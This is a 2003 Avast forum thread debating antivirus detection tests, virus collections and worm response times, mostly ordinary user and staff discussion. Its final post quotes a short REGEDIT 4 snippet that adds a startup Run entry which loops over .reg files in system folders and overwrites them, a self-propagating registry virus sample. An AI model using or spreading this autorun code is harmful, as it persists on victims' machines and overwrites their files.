Author Topic: avast terrible in virii detect?!?!?!?  (Read 28301 times)

0 Members and 1 Guest are viewing this topic.

Offline raman

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 1062
Re:avast terrible in virii detect?!?!?!?
« Reply #30 on: October 11, 2003, 09:40:42 PM »
If you want really serious tests with viruses you have to let them infect files (real or only goatfiles) than you know if it is a "good" sample or a corrupted one. Most of the samples in "internet-viruscollections" are generic one samples. That means that they were compiled from the source but never infected a file. Thats the reason Viruses in these collections are as big as they reported by the Av-scanner^. So an Austr-Para-784 is only 784 or 785 bytes "big".

BTW: Geting the "right" viruses even AVG will beat KAV (or Avast).
MfG Ralf

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67195
Re:avast terrible in virii detect?!?!?!?
« Reply #31 on: October 11, 2003, 09:51:15 PM »
If you want really serious tests with viruses you have to let them infect files (real or only goatfiles) than you know if it is a "good" sample or a corrupted one. Most of the samples in "internet-viruscollections" are generic one samples. That means that they were compiled from the source but never infected a file. Thats the reason Viruses in these collections are as big as they reported by the Av-scanner^. So an Austr-Para-784 is only 784 or 785 bytes "big".

BTW: Geting the "right" viruses even AVG will beat KAV (or Avast).

Vlk, could you say something about what raman wrotes?  8)
The best things in life are free.

Offline pk

  • Avast team
  • Super Poster
  • *
  • Posts: 2078
Re:avast terrible in virii detect?!?!?!?
« Reply #32 on: October 11, 2003, 10:02:09 PM »
Vlk, could you say something about what raman wrotes?  8)

It's rather the question for Pavel. I don't exactly know, but I guess the virus has to infect about 100+ exact (goat) files with the different size (there can be other variable values/append size/... in the virus body) and then the unique signature can be chosen - not with using a tool.
« Last Edit: October 11, 2003, 10:04:01 PM by pk »

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67195
Re:avast terrible in virii detect?!?!?!?
« Reply #33 on: October 11, 2003, 10:07:29 PM »
Vlk, could you say something about what raman wrotes?  8)

Thanks, pk. Does Pavel has something to tell us?  ;D
The best things in life are free.

Pavel Baudis

  • Guest
Re:avast terrible in virii detect?!?!?!?
« Reply #34 on: October 11, 2003, 11:05:19 PM »
BTW: Geting the "right" viruses even AVG will beat KAV (or Avast).

No, I don't agree with this. As I already mentioned some months ago, we frequently run several AV programs against our virus collection. Although I will never publish these results, the best detection rate goes to KAV, McAfee and avast!, followed by F-Prot and Sophos. We have tried AVG and NOD32 in the past but their detection rates for FULL database was so low we decide not to include them into our regular tests. And yes - it was big surprise for us too ;)

BTW: these tests do not IN ANY WAY cover the real world virus detection!

Hope this helps
Pavel

Offline raman

  • Avast Evangelist
  • Advanced Poster
  • ***
  • Posts: 1062
Re:avast terrible in virii detect?!?!?!?
« Reply #35 on: October 11, 2003, 11:32:24 PM »
BTW: Geting the "right" viruses even AVG will beat KAV (or Avast).
No, I don't agree with this.

I think AVG will be able to make a test where Avg gets the first place.Just like the moosoft test mentioned somewhere here in the forum
MfG Ralf

Pavel Baudis

  • Guest
Re:avast terrible in virii detect?!?!?!?
« Reply #36 on: October 12, 2003, 12:06:00 AM »
BTW: Geting the "right" viruses even AVG will beat KAV (or Avast).
No, I don't agree with this.

I think AVG will be able to make a test where Avg gets the first place.Just like the moosoft test mentioned somewhere here in the forum
Yes, you are right. This is one of the reasons why we will never publish our results from these tests ;) All I wanted to say is that we were really surprised by the AVG and NOD results in those tests!

Pavel

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67195
Re:avast terrible in virii detect?!?!?!?
« Reply #37 on: October 12, 2003, 01:27:58 AM »
Yes, you are right. This is one of the reasons why we will never publish our results from these tests ;) All I wanted to say is that we were really surprised by the AVG and NOD results in those tests!
Pavel

Can't avast! be better than AVG and NOD  ;D
The best things in life are free.

asafdem

  • Guest
sex, lies and virii collections
« Reply #38 on: October 12, 2003, 10:14:56 AM »
raman
Quote
F-prot is really good in identify such garbage. Often it reports (by using /collect) such files as corrupted ,garbage or "not a virus"!:)
In my small informal comparative test I included f-prot for DOS, see http://www.avast.com/forum/index.php?board=2;action=display;threadid=1379;start=15

Here is attached f-prot report file, rptcoll.txt What do you make out of it? Does it make my test files in any way good or bad for testing , I really don't know, and I don't care much. I was just curious.  And now, let's get back to real life.

As an admin in our company within our corporate network I did some real life testing by accident. Not so while ago, my system started to shut down whenever I connected to the Net. U already know what I'm talking about. One day later, Amon (NOD's resident monitor) reported Lovesan worm. Because I had many other AV products on my system for testing purposes, I decided to double and triple check the suspicious file. At the time on my test machine, apart from NOD, there were:

NAV 2003, Panda 7.04 Platinum, KAV 4.05 lite, F-prot 3.1x, DrWeb 4.2x. I turned off the Amon and scanned the suspicious file with all of them and not a single one deteced it!
I was puzzled. I decided to discard the NOD's detection as a false alarm and blamed it on the Microsoft. I manually updated all of the above products and scanned my system and still there were no results!
Day after, annoyed with the behavior of my system I decided to take look at the worms' description at NOD's site and that was it! I removed the worm and watched when other vendors will update their definitions and for some it took days before they finally did it. Two days later, our corporate admin called and said: We have a virus on our LAN! I replied that I know, and I just waited to see how long it’d take McAfee installed in our central office to catch it! ( Lovesan/Blaster was more an annoyance than a big threat in its first incarnation).

So what are we talking about here? Is it really important if product A or B catches some obscure virus and product C doesn’t? I don't think so. Eventually, every major AV product will catch any global virus/worm threat. The question is, how soon, which is especially important in those days of so called blended threats. And what's the use of incremental updates if update process effectively disables AV product you are using, as it does with some of the products in the market.

So, the focus should be on the response time, accuracy and robustness of the update process. ::)

PS
I'm in no way an advocate for NOD and if you look at the above-mentioned thread I never mentioned it there, or here, or anywhere else in this forum until somebody else mentioned it. Also, at the time, I didn't know about AVAST! ;)

asafdem

  • Guest
ad endum
« Reply #39 on: October 12, 2003, 10:20:37 AM »
Quote
So, the focus should be on the response time, accuracy and robustness of the update process.
…and the ability to repair the damage! :)

Offline Vlk

  • Avast CEO
  • Serious Graphoman
  • *
  • Posts: 11658
  • Please don't send me IM's. Email only. Thx.
    • ALWIL Software
Re:avast terrible in virii detect?!?!?!?
« Reply #40 on: October 12, 2003, 10:22:31 AM »
Oh, asafdem, thanks for this post. I think you're absolutely right. It's not about the total number of virii detected, it's mainly about the

(1) overall reliability/stability
(2) speed of reaction to the new threats (the duration between a virus is released and your installation of the AV program is able to detect it)

These are the two most important aspects.

Thanks again for your rel-life story
Vlk
If at first you don't succeed, then skydiving's not for you.

asafdem

  • Guest
Re:avast terrible in virii detect?!?!?!?
« Reply #41 on: October 12, 2003, 10:40:26 AM »
No problem, but my Karma is still down to 0! :'(

Offline Vlk

  • Avast CEO
  • Serious Graphoman
  • *
  • Posts: 11658
  • Please don't send me IM's. Email only. Thx.
    • ALWIL Software
Re:avast terrible in virii detect?!?!?!?
« Reply #42 on: October 12, 2003, 10:50:56 AM »
Is it? ;)
(end of story, moderator says)
If at first you don't succeed, then skydiving's not for you.

mantra

  • Guest
Re:avast terrible in virii detect?!?!?!?
« Reply #43 on: October 12, 2003, 11:35:45 AM »
@pavel
"Although I will never publish these results, the best detection rate goes to KAV, McAfee and avast!, followed by F- Prot and Sophos. "

did u test with bitdefender?!? and

and how many viruses have u in your database? the same of avast?

mantra

  • Guest
Re:avast terrible in virii detect?!?!?!?
« Reply #44 on: October 12, 2003, 11:44:48 AM »
a question to vlk

what can do ?

REGEDIT 4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"